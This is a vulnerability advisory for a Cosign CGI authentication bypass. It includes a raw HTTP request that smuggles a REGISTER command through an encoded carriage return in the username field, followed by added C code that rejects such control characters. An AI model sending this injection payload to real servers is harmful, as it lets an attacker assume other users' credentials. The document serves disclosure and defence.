Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass Vulnerability

ID SSV:83320
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.

An authenticated attacker can exploit this issue to access services hosted on an affected computer by assuming another user's credentials.

Versions prior to 1.9.4b and 2.0.2a are vulnerable. 

POST /cosign-bin/cosign.cgi HTTP/1.0
Cookie: cosign=X
Content-Type: application/x-www-form-urlencoded
Content-Length: N

required=& cosign=X2 username%0DREGISTER cosign=X2 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In
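
The input check whose absence the advisory describes, as an added example (not Cosign's code and not the vendor's fix). It assumes the CGI passes each form value as one argument of a space-separated, line-terminated command, as the `%0DREGISTER` sequence in the request above suggests; the function names are hypothetical and the sample inputs are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/* Decode one application/x-www-form-urlencoded value into out.
 * Returns the decoded length, or -1 on a malformed escape, NUL byte or overflow. */
static int form_decode(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in != '\0'; in++) {
        int c = (unsigned char)*in;
        if (c == '+') {
            c = ' ';
        } else if (c == '%') {
            unsigned int v;
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            sscanf(in + 1, "%2x", &v);
            c = (int)v;
            in += 2;
        }
        if (c == 0 || n + 1 >= outlen)
            return -1;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (int)n;
}

/* Returns 1 if the raw form value is safe to use as a single command
 * argument (assumed protocol: space-separated, line-terminated), else 0. */
int safe_protocol_arg(const char *raw)
{
    char buf[256];
    int len = form_decode(raw, buf, sizeof(buf));
    if (len <= 0)
        return 0;
    for (int i = 0; i < len; i++) {
        unsigned char c = (unsigned char)buf[i];
        if (c <= 0x20 || c == 0x7f)   /* CR, LF, space, tab, other controls */
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed samples; the second is the fragment from the request above. */
    const char *samples[] = { "test", "username%0DREGISTER", "a+b", "bad%zz" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-22s -> %s\n", samples[i],
               safe_protocol_arg(samples[i]) ? "accept" : "reject");
    return 0;
}
```

The check runs on the decoded value, so an encoded carriage return is rejected the same way as a literal one.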